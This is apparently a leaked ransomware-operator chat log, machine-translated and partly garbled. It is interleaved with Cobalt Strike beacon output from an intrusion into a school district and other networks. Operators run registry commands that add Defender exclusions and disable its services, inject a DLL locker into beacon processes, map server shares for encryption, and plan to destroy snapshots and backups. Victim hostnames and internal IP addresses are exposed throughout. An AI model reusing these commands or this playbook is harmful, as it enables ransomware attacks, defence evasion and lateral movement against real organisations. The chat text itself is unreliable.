      PCHIDCG004.Hobbes.loc [DS] Site: Chicago
    USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
    USCHA-DCG002.Hobbes.loc [DS] Site: WDC
    USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
    USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
      PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
         sh-0004.hobbes.loc [RODC]
``Take everything into the coba, or how then mapi armas on the server) suddenly, and we have already rubbed) no yet, the build waited[ ](https://mediaeveryone.com/group/expfederal-com?msg=a9ZRNruNqr5WfySKo) have you done it?
SIOJDG*(H78SHD(HGL(&SE*FHUiWESY&*(HJGI
``Are we done with the centersof the sphere? Do we have to disable vindef and sofos?
the new build seems to be working, right? now on the fast, we'll pull the servers into the cobu user 7@tl1 will now give the build the contents of the cryptimnu image yes
just snapshots tear down wait for build)well @tl2backup server also found in hellcompact they had two nix servers in hell under the allsphere, now one is not available, the other whether not working, or not configured
and these two that were found, not visible in ad comp - there are stored snapshots
sofos admin foundnu we just overwrite them, right?[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk) under the root came here. is there a build under the lin?
@echo off
for /f %%i in (hosts.txt) do (
	tasklist /s %%i /v >> .\ps.txt
)
``webrootanywhere``wsndomain.com - do not touch
``itc-us.com`` - work with her by kerbals by the way? if you use zerologon successfully there will be a chance to drink in the next day i think, so if you do it till the end today you can do it via @otam where today you will take YES you can finish it carefully can not promise anythingKILL THE NET INSTRUCTOR UP, HE CAN DO IT!before you go to groups, write down what's at what stage and don't kill the networkDisassemble the tool:fingers_crossed:where there are deadlocks today,//www.trendmicro.com/en_us/what-is/zerologon.htmlдо 12 today, not working on weekendsmonitor the input cob for new sessionswrite in groups that are active now and statuscom in the workIf there are new throw there, work what about the sessions? I have them off4 and 7priloveWhere are the rest of you? everyone Hello so already added? `itc-us-com `conf name where to add itc-us-com What is it? ITC.LOCAL turns out so#itc-us-com ?ITCMA and no yes there is a system with user7 help user1 now i'll add you to the team of free users write in groups where there is no system yes tomorrow will be clear or without allThis weekend without me.and since you did not sleep, tomorrow i will divide the day on "today - sleep - tomorrow" and not today then why tomorrow is tomorrow = today?tomorrow will be clear for sure it's still conditional info!!!!!!!!!!!!!!!!!!!!!!!! will be a day off on saturday, as well as on sunday before 7 will raise the system to yes? tomorrow = today tomorrow by 3 today until 7write the statuses in the active groups how are you doing?Hi! - Goodbye, all have a day off on friday :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: At 6 pm on friday9that is today?or sleep = tomorrow1.done.sisd.pettomorrow on thursday friday don't have a day off tomorrow by 6 pm 610 mina although stop probably I won't keep you up long :thumbsup:sleep till 10 so you said today we'll sleep the sessions do not kill good work well well donetoday at 10 pmtomorrow is thursday?no)morning? tomorrow by 10 then all of 277 23 or not pinged or couldn't pull then servers[ ](https://mediaeveryone.com/group/sisd-net?msg=25bsnyQBjuzt8dybR) on two domains on the second domain servers?report on the 2 domainsomotely97 servers that could not jump all the disks pulled up and in the second what do we have? in our coba 153 servers.all? raise sagging 2 and remains dk finished? 13 what's left? in 20 min I think you can manage56 in 11 for each how much? not a lot of servers left? no so what's done? not all, do not break 7772 is NAS3 only on the free? tomorrow we sleep sleep on it continue dazd. i started the build, check the udm and then mappy went all server map closed? no sure, maybe 1000 somewhere or something smaller i thought you all are not finished? so servers with unmapped armaments close? skype a report on how many closed armaments and servers and basically kill them in a small domain
beacon> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:

Host Name: AHS-VIDEO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 8/4/2016, 10:49:05 AM
System Boot Time: 11/30/2020, 7:44:12 AM
System Manufacturer: Dell Inc.
System Model: PowerEdge R230
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3504 Mhz
BIOS Version: Dell Inc. 2.3.2, 11/16/2017
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: N/A
Time Zone: (UTC-07:00) Mountain Time (US & Canada)
Total Physical Memory: 32.599 MB
Available Physical Memory: 22,622 MB
Virtual Memory: Max Size: 37.463 MB
Virtual Memory: Available: 23,901 MB
Virtual Memory: In Use: 13,562 MB
Page File Location(s): C:\pagefile.sys
Domain: admin.sisd.k12
Logon Server: N/A
Hotfix(s): 185 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894029
                           [05]: KB2894179
                           [06]: KB2894852
                           [07]: KB2903939
                           [08]: KB2911106
                           [09]: KB2919355
                           [10]: KB2919394
                           [11]: KB2928680
                           [12]: KB2934520
                           [13]: KB2938066
                           [14]: KB2954879
                           [15]: KB2966826
                           [16]: KB2966828
                           [17]: KB2967917
                           [18]: KB2968296
                           [19]: KB2972103
                           [20]: KB2989930
                           [21]: KB3000483
                           [22]: KB3000850
                           [23]: KB3003057
                           [24]: KB3004545
                           [25]: KB3012235
                           [26]: KB3012702
                           [27]: KB3013172
                           [28]: KB3013531
                           [29]: KB3013538
                           [30]: KB3013769
                           [31]: KB3013791
                           [32]: KB3013816
                           [33]: KB3014442
                           [34]: KB3015696
                           [35]: KB3018133
                           [36]: KB3019978
                           [37]: KB3021910
                           [38]: KB3023219
                           [39]: KB3023266
                           [40]: KB3024751
                           [41]: KB3024755
                           [42]: KB3030947
                           [43]: KB3033446
                           [44]: KB3035126
                           [45]: KB3036612
                           [46]: KB3037576
                           [47]: KB3038002
                           [48]: KB3042085
                           [49]: KB3044374
                           [50]: KB3044673
                           [51]: KB3045634
                           [52]: KB3045685
                           [53]: KB3045717
                           [54]: KB3045719
                           [55]: KB3045755
                           [56]: KB3045999
                           [57]: KB3046017
                           [58]: KB3046737
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB30544464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3059317
                           [66]: KB3060681
                           [67]: KB3060793
                           [68]: KB3061512
                           [69]: KB3063843
                           [70]: KB3071756
                           [71]: KB3072307
                           [72]: KB3074228
                           [73]: KB3074545
                           [74]: KB3076949
                           [75]: KB307715
                           [76]: KB3078405
                           [77]: KB3080149
                           [78]: KB3084135
                           [79]: KB3084905
                           [80]: KB3086255
                           [81]: KB3087137
                           [82]: KB3091297
                           [83]: KB3094486
                           [84]: KB3095701
                           [85]: KB3097992
                           [86]: KB3099834
                           [87]: KB3100473
                           [88]: KB3102429
                           [89]: KB3103616
                           [90]: KB3103696
                           [91]: KB3103709
                           [92]: KB3109103
                           [93]: KB3109560
                           [94]: KB3109976
                           [95]: KB3110329
                           [96]: KB3115224
                           [97]: KB3118401
                           [98]: KB3121261
                           [99]: KB3123245
                           [100]: KB3126434
                           [101]: KB3126587
                           [102]: KB3127222
                           [103]: KB3133043
                           [104]: KB3133690
                           [105]: KB3134179
                           [106]: KB3134815
                           [107]: KB3135782
                           [108]: KB3137728
                           [109]: KB3138378
                           [110]: KB3138602
                           [111]: KB3138910
                           [112]: KB3138962
                           [113]: KB3139164
                           [114]: KB3139398
                           [115]: KB3139914
                           [116]: KB3140219
                           [117]: KB3140234
                           [118]: KB3145384
                           [119]: KB3145432
                           [120]: KB3146604
                           [121]: KB3146723
                           [122]: KB3146751
                           [123]: KB3147071
                           [124]: KB3155784
                           [125]: KB3156059
                           [126]: KB3159398
                           [127]: KB3161949
                           [128]: KB3162343
                           [129]: KB3162835
                           [130]: KB3172614
                           [131]: KB3172729
                           [132]: KB3173424
                           [133]: KB3175024
                           [134]: KB3178539
                           [135]: KB3179574
                           [136]: KB3185319
                           [137]: KB3186539
                           [138]: KB4033369
                           [139]: KB4033428
                           [140]: KB4040972
                           [141]: KB4040974
                           [142]: KB4040981
                           [143]: KB4041777
                           [144]: KB4043763
                           [145]: KB4048951
                           [146]: KB4049179
                           [147]: KB4054566
                           [148]: KB4054854
                           [149]: KB4056887
                           [150]: KB4095875
                           [151]: KB4096417
                           [152]: KB4098972
                           [153]: KB4103729
                           [154]: KB4338832
                           [155]: KB4457009
                           [156]: KB4457015
                           [157]: KB4457034
                           [158]: KB4457045
                           [159]: KB4457146
                           [160]: KB4459935
                           [161]: KB4459941
                           [162]: KB4462930
                           [163]: KB4477029
                           [164]: KB4480054
                           [165]: KB4480064
                           [166]: KB4480095
                           [167]: KB4480979
                           [168]: KB4483187
                           [169]: KB4483450
                           [170]: KB4483459
                           [171]: KB4486105
                           [172]: KB4487038
                           [173]: KB4493478
                           [174]: KB4532931
                           [175]: KB4532940
                           [176]: KB4532946
                           [177]: KB4534117
                           [178]: KB4537759
                           [179]: KB4552933
                           [180]: KB4552982
                           [181]: KB4561600
                           [182]: KB4565613
                           [183]: KB4565635
                           [184]: KB4566425
                           [185]: KB4565541
Network Card(s): 6 NIC(s) Installed.
                           [01]: Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Synology1
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 192.168.4.5
                           [02]: Intel(R): Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Synology2
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 192.168.4.1
                           [03]: Intel(R): Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Slot 1 Port 3
                                 Status: Hardware not present
                           [04]: Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Slot 1 Port 4
                                 Status: Media disconnected
                           [05]: Broadcom NetXtreme Gigabit Ethernet
                                 Connection Name: NIC1
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.11.200.121
                                 [02]: fe80::5023:321f:3ab4:86d7
                           [06]: Broadcom NetXtreme Gigabit Ethernet
                                 Connection Name: NIC2
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``Well, what's cool besides dns and dkpolly? Did you close the second domain? Give me more sisteminfo of this session and everything ok try the exe`` ``
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
The operation completed successfully.


C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
The operation completed successfully.


C:\ProgramData>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
The operation completed successfully.


``Second domain kst closed? drop windef@user8 and try through ehenhene broke DNS, DCserver632dllinject - architecture - gonet, session what? How should I know[ ](https://mediaeveryone.com/group/sisd-net?msg=xBtYErQTfxN43GxQj) and what is this? yes:all servers were closed?
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
``Yeah, and then the eyes in a bunch alreadyCHae when will dc break? work prettak so what do you have there? The main thing that the session did not fall offkv in the process just about this yanu like the udmi is, and the format does not all change the filesa udmi?well there not all files appear .HWOEU or something like that? only readme.txtfile kst appearedsession should be aliveopen it pliz2860dai pid bicona and tdnase close the server with the hrvNo c.lf ``
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[+] received output:
Injected.
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes

``Launch a zamapilid server in parallel do we drop mapping and start encrypting? here.lflisting C:how do we know what works? in the session where mapping under any kredavs? blank dllinject field in the argument what to put in?
	Geordi.sisd.k12 [PDC] [DS] Site: DoTs
	Picard.sisd.k12 [DS] Site: DoTs
	   Lor.sisd.k12 [DS] Site: Ed-Center
``````
 ADMINDC5 10.0.61.13
 ADMINDC1 10.0.61.2
 ADMINDC3 10.0.61.6
 ADMINDC4 10.0.61.7
 ADMINDC2 10.0.61.10
 SPOCK 10.7.51.3
 AZUREDC1 10.221.32.4
``To the very last, do NOT TAKE THEM AND DON'T TROUBLE the right bitness dll startup through dllinjest on servers where it's mapped in full``SDFHGS*^EFG*&WE`n the fuck left?[ ](https://mediaeveryone.com/group/sisd-net?msg=ATRhRQckBAaXAgA4f) by two, but ours is the least of itServers are starting to hang you by 3 kobas divided? We are starting to hang what mapi - mapiem then continue the list``
beacon> shell net view \10.16.239.134\
[*] Tasked beacon to run: net view \\10.16.239.134\
[+] host called home, sent: 56 bytes
[+] received output:
There are no entries in the list.

Then there's no resonance? Did you use the IP to map? I got 50 out of 200 armies - 30% - The network path was not found.
70% - The network path was not found.I leave those servers and go map armies?
beacon> shell net use * \\10.0.53.26\dump
[*] Tasked beacon to run: net use * \\\10.0.53.26\dump
[+] host called home, sent: 58 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


beacon> shell net use * \\10.0.53.26\engrade
[*] Tasked beacon to run: net use *\\\10.0.53.26\engrade
[+] host called home, sent: 61 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``Map everything or one of them? Not yet```
beacon> shell net view \10.0.53.26\
[*] Tasked beacon to run: net view \10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.53.26\.



Share name Type Used as Comment

-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.
```
Did you copy these?
beacon> shell net view \10.0.53.26\
[*] Tasked beacon to run: net view \10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.53.26\.



Share name Type Used as Comment

-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.


beacon> shell net view \10.0.50.1\
[*] Tasked beacon to run: net view \10.0.50.1\
[+] host called home, sent: 52 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.53.25\
[*] Tasked beacon to run: net view \10.0.53.25\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.

``the same story``
beacon> shell net view \10.51.200.121\
[*] Tasked beacon to run: net view \10.51.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


``Check with another server, are those from ``??
- MY-SISD-NFS: 10.0.61.61 ?
- VIDEO-SOH: 10.13.200.122 mapped
- VDI-PVS: 10.210.0.40 mapped
- STU-HOME: 10.0.61.57 ???
- T-HYPERV: 10.0.53.230 ???
- SESROEVIDEOSVR: 10.116.200.121 ???
- RIERHM-VIDEOSVR: 10.58.200.121 ???
- SQLCLUSTER: 10.0.53.25 ???
- VDI-PVS01-2: 10.210.0.51 mapped
- STU-SERVER: 10.0.50.1 ???
- VDI-PVS02-1: 10.210.0.42 mapped
- VDI-XD02: 10.210.0.62 mapped
- VDI-PVS01-1: 10.210.0.41 mapped
- VDI-XD01: 10.210.0.61 mapped.
- NPM-01: 10.0.51.84 mapped
- CAUSQLCL8wx: 10.0.53.24 mapped
- VDI-PVS02-2: 10.210.0.52 mapped
- CLARKE-SVE: 10.51.200.121 ?
- TylerSISCluster: 10.0.53.26 ???
- CATE-NAS: 10.0.61.69 mapped
``````
beacon> shell net view \10.0.61.61\
[*] Tasked beacon to run: net view \10.0.61.61\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.61.61\



Share name Type Used as Comment

-------------------------------------------------------------------------------
Scann Disk
The command completed successfully.


beacon> shell net view \10.0.61.57\
[*] Tasked beacon to run: net view \10.0.61.57\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.53.230\
[*] Tasked beacon to run: net view \10.0.53.230\
[+] host called home, sent: 54 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.116.200.121\
[*] Tasked beacon to run: net view \10.116.200.121\
[+] host called home, sent: 57 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


beacon> shell net view \10.58.200.121\
[*] Tasked beacon to run: net view \10.58.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


beacon> shell net view \10.0.53.25\
[*] Tasked beacon to run: net view \10.0.53.25\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.50.1\
[*] Tasked beacon to run: net view \10.0.50.1\
[+] host called home, sent: 52 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.53.26\
[*] Tasked beacon to run: net view \10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.53.26\.



Share name Type Used as Comment

-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.


beacon> shell net view \10.51.200.121\
[*] Tasked beacon to run: net view \10.51.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``They're only available.
beacon> shell net view \10.0.61.61\
[*] Tasked beacon to run: net view \10.0.61.61\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.61.61\



Share name Type Used as Comment

-------------------------------------------------------------------------------
Scann Disk
The command completed successfully.

Look without /all + did you look through net view /all?
beacon> shell dir \\10.0.61.61\E$
[*] Tasked beacon to run: dir \\10.0.61.61\E$
[+] host called home, sent: 50 bytes
[+] received output:
The network name cannot be found.
``[ ](https://mediaeveryone.com/group/sisd-net?msg=m6zxd8WsviWgkxFQs) can you see the dir? no, we only pull what's pulling C? no[ ](https://mediaeveryone.com/group/sisd-net?msg=mLKXLRCzPvYxMwx9c) except for the other mappings?
Status Local Remote Network

-------------------------------------------------------------------------------
OK Q:        \10.210.0.51\C$ Microsoft Windows Network
OK R:        \10.210.0.42\C$ Microsoft Windows Network
OK S:        \10.210.0.42C$ Microsoft Windows Network
OK T:        \10.210.0.62$ Microsoft Windows Network
OK U:        \10.210.0.41.41\C$ Microsoft Windows Network
OK V:        \10.210.0.61\C$ Microsoft Windows Network
OK W:        \10.0.51.84$ Microsoft Windows Network
OK X:        \10.0.53.24\C$ Microsoft Windows Network
OK Y:        \10.210.0.52$ Microsoft Windows Network
OK Z:        \10.0.61.69\N$ Microsoft Windows Network

The drive is a letter, i.e. net use A: \host\c$$$ do you mapped to letters?[ ](https://mediaeveryone.com/group/sisd-net?msg=JTcdnWK4Mt9pQTh4C) this one has disks - yes ``
beacon> shell net use *\\\10.0.61.61\C$
[*] Tasked beacon to run: net use *\\\10.0.61.61\C$
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.
```
```
Shared resources at \\10.0.61.61\



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
E$ Disk Default share
G$ Disk Default share
I$ Disk Default share
IPC$ IPC Remote IPC
M$ Disk Default share
P$ Disk Default share
Q$ Disk Default share
R$ Disk Default share
Scann Disk
T$ Disk Default share
The command completed successfully.
``ad_computers.txt:7592: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:7641: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:7690: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:826378: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:1560647: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
I see that these are attracted?
and which are not attracted it seems to be part of the cluster - there is simply replicated data, check.... and this is attracted?
HyperV-Dell01.admin.sisd.k12
``consistently.''
[*] Listing: \\10.0.61.69\N$\shared\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 03/09/2015 09:03:16 $RECYCLE.BIN
          dir 11/17/2017 08:39:57 amh
          dir 01/16/2020 14:13:59 BPA
          dir 01/16/2019 16:49:23:23 BPA Teacher
          dir 11/14/2019 13:03:31 CTE
          dir 03/09/2015 09:05:42:42 ech
          dir 10/15/2019 12:54:42 ED9
          dir 04/03/2017 14:12:52:52 edh
          dir 09/09/2015 09:02:26 ELH
          dir 03/09/2015 09:12:02:02 files
          dir 11/19/2019 09:28:51 GoVenture
          dir 03/28/2016 14:48:04 key
          dir 03/09/2015 09:15:51 moh
          dir 03/09/2015 09:16:05 most2003
          dir 03/09/2015 09:16:31 oph
          dir 03/09/2015 09:16:35 PM PharmExam
          dir 09/09/2015 09:24:12 PM Profile
          dir 04/06/2017 10:44:18 PM software
          dir 09/09/2016 09:28:04 soh
          dir 03/09/2015 10:55:17 PM System Volume Information
          dir 03/09/2015 10:55:17 vBusiness

``and shared
[*] Listing: \\10.0.61.69\N$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 05/05/2020 14:45:23 $RECYCLE.BIN
          dir 12/10/2018 09:34:11 Backup Agents for Cluster Groups
          dir 02/19/2019 08:08:46 Program Files
          dir 01/16/2019 16:34:55 shared
          dir 12/07/2020 19:04:06:06 System Volume Information
``[ ](https://mediaeveryone.com/group/sisd-net?msg=kPsFe4JH3LQiz9mxS) give me a listing of this directory N$$ do not see disks they are not attracted, no ball
```
Av-CNS-HyperV: 10.0.53.210
Av-HyperV-Dell1: 10.0.53.250
Av-HyperV-FX2-1: 10.0.53.193
Av-T-HyperV: 10.0.53.238
``I poked at the randome what if yes - all the folders inside the N$ are contained all the folders that are ``next to it``?
beacon> portscan 10.0.61.69 445,135,139
[*] Tasked beacon to scan ports 445,135,139 on 10.0.61.69
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.0.61.69' is alive. [read 8 bytes]
10.0.61.69:139
10.0.61.69:135
10.0.61.69:445 (platform: 500 version: 10.0 name: NAS2 domain: ADM)
``no need for that
there are almost no handhelds on workstations, cobalt can't handle 1k sessions[ ](https://mediaeveryone.com/group/sisd-net?msg=uvhfe2qF95gvoH6Wr) already wrote it down[ ](https://mediaeveryone.com/group/sisd-net?msg=c6Hi5Lq5CY6yQcjtZ) so what? @user8 please give me access to the cobalt private where you have a session with the YES token
beacon> shell net view \10.0.61.69 /all
[*] Tasked beacon to run: net view \\10.0.61.69 /all
[+] host called home, sent: 57 bytes
[+] received output:
Shared resources at \10.0.61.69



Share name Type Used as Comment

-------------------------------------------------------------------------------
amh Disk
BPA Disk
CTE Disk
ech Disk
ED9 Disk
EDH Disk
ELH Disk
files Disk
GoVenture Disk
IPC$ IPC Remote IPC
KEY Disk
MOH Disk
most2003 Disk
N$ Disk Z: Cluster Default Share
OPH Disk
PharmExam Disk
Profile Disk
shared Disk
software Disk
SOH Disk
vbusiness Disk
The command completed successfully.



Shell net view \10.0.61.69 /all right, that's what I mean)) like a variant without a drop to disk
beacon> shell wmic /node:10.0.61.69 os get name
[*] Tasked beacon to run: wmic /node:10.0.61.69 os get name
[+] host called home, sent: 64 bytes
[+] received output:
Name

Microsoft Windows Server 2016 Standard|C:\Windows|\Device\Harddisk0\Partition2

``To bypass the avne spread
and inject the dll locker into the current biconay process, as I understood that the new script will spread the build across all the sessions open in the coba. So maybe it's better to pull the armas into the coba and not mount them? or the nix server? and you're sure it's the windup at all?
Shares for 10.0.61.69:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		amh BPA CTE ech ED9 EDH ELH files GoVenture KEY MOH most2003 N$ OPH PharmExam Profile shared software SOH vbusiness
******* COMPLETE *******

``or wmica net view?
beacon> shell wmic /node:10.0.61.69 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:10.0.61.69 logicaldisk get description,name
[+] host called home, sent: 85 bytes
[+] received output:
Description Name

Local Fixed Disk C:

Local Fixed Disk F:

Local Fixed Disk N:
```
```
beacon> shell net use * \\10.0.61.69\C$
[*] Tasked beacon to run: net use *\\\10.0.61.69\C$
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

```
:thinking:is this what we have? Example
`execute-assembly /home/user/TOOLS/SharpSharesNG.exe shares DMZ-HyperV````
        /*
         * SharpSharesNG <ips|shares> --max-threads 10 --output console|/path/to/file
         *
         * ips - equiv ips ad
         * ips 10.0.0.1 [--os-detect] [--alive]
         * ips 10.0.0.1/24 [--os-detect] [--alive]
         * ips HostName [--os-detect] [--alive]
         * ips [ad] [--os-detect] [--alive]
         * ips [list] c:\users\hostlist.txt [--os-detect] [--alive]
         *
         *
         * shares - equiv shares ad
         * shares 10.0.0.1 [--os-detect] [--public-only]
         * shares 10.0.0.1/24 [--os-detect] [--public-only]
         * shares HostName [--os-detect] [--public-only]
         * shares [ad] [--os-detect] [--public-only]
         * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
So you'll have about 2k matched armas and then let's map the armas to 10 per server. Now the goal is to map the rest of the servers, all their network drives and leave them untouched except for the dk and dns servers.
SISD-SQL: 10.0.61.70 -
SISD-SQLFC: 10.0.61.73 -
NAS: 10.0.61.80 -
HYPERV-DELL01: 10.0.53.240 -
HyperV-FX2-01: 10.0.53.199 - -
CNS-HyperV: 10.0.53.200 - -
ESPAPP1: 10.0.53.52 - -
SCHOOLBO: 10.0.254.4 - -
ESPTSK3: 10.0.53.58 - -
ADM-CCRP: 10.0.254.3 -
```
all network drives on the current servers are mapped the rest of the servers are mapped. now do this, it's like this: 222 of 277 servers are mapped? how many servers in total are mapped? where no session is mapped? if pipe, nothing is mapped if regular dll`` ``.
Shares for CAUSQLCL8wx:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ClusterStorage$
******* COMPLETE *******

``Where ??? there either
```
The network name cannot be found.
```
or
```
The network path was not found.
```
it gives out after a while, the change of codes didn't help ``pipe netjump no`` ``
- MY-SISD-NFS: 10.0.61.61 ?
- VIDEO-SOH: 10.13.200.122 ProcessId = 19316; ReturnValue = 0;
- VDI-PVS: 10.210.0.40 ProcessId = 8176; ReturnValue = 0;
- STU-HOME: 10.0.61.57 ?
- T-HYPERV: 10.0.53.230 ???
- SESROEVIDEOSVR: 10.116.200.121 ???
- RIERHM-VIDEOSVR: 10.58.200.121 ???
- SQLCLUSTER: 10.0.53.25 ???
- VDI-PVS01-2: 10.210.0.51 ProcessId = 9912; ReturnValue = 0;
- STU-SERVER: 10.0.50.1 ???
- VDI-PVS02-1: 10.210.0.42 ProcessId = 6424; ReturnValue = 0;
- VDI-XD02: 10.210.0.62 ProcessId = 8956; ReturnValue = 0;
- VDI-PVS01-1: 10.210.0.41 ProcessId = 12324; ReturnValue = 0;
- VDI-XD01: 10.210.0.61 ProcessId = 7988; ReturnValue = 0;
- NPM-01: 10.0.51.84 ProcessId = 16948; ReturnValue = 0;
- CAUSQLCL8wx: 10.0.53.24 ProcessId = 9300; ReturnValue = 0;
- VDI-PVS02-2: 10.210.0.52 ProcessId = 1764; ReturnValue = 0;
- VDI-PVS02: 10.51.200.121 ?
- TylerSISCluster: 10.0.53.26 ???
- CATE-NAS: 10.0.61.69 ???
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
Shares for Av-DMZ-HyperV:
	[--- Unreadable Shares ---]
		IPC$


``````
VERSASQL: 10.0.53.98`
`` Arrived under other creeds[ ](https://mediaeveryone.com/group/sisd-net?msg=DcRLKdoj2X7BEKciC) no, from another server under other creeds - everything is the same itself now I will try another one... by the way as far as I see there is a lot about hypervi... these servers hold images - if you don't deal with them, the grid is likely to recover in one click is out of my 55 not attracted? is it out of 200?
```
EDHF-SPED: 10.0.61.226
STU-YEARBOOK: 10.0.50.222
ADM-TECH1: 10.0.51.104
Av-CNS-HyperV: 10.0.53.210
CAUSQLCL8wx: 10.0.53.23
Av-HyperV-Dell1: 10.0.53.250
Av-HyperV-FX2-1: 10.0.53.193
Av-T-HyperV: 10.0.53.238
Retired-VMs: 10.0.51.97
WAC: 10.0.61.75
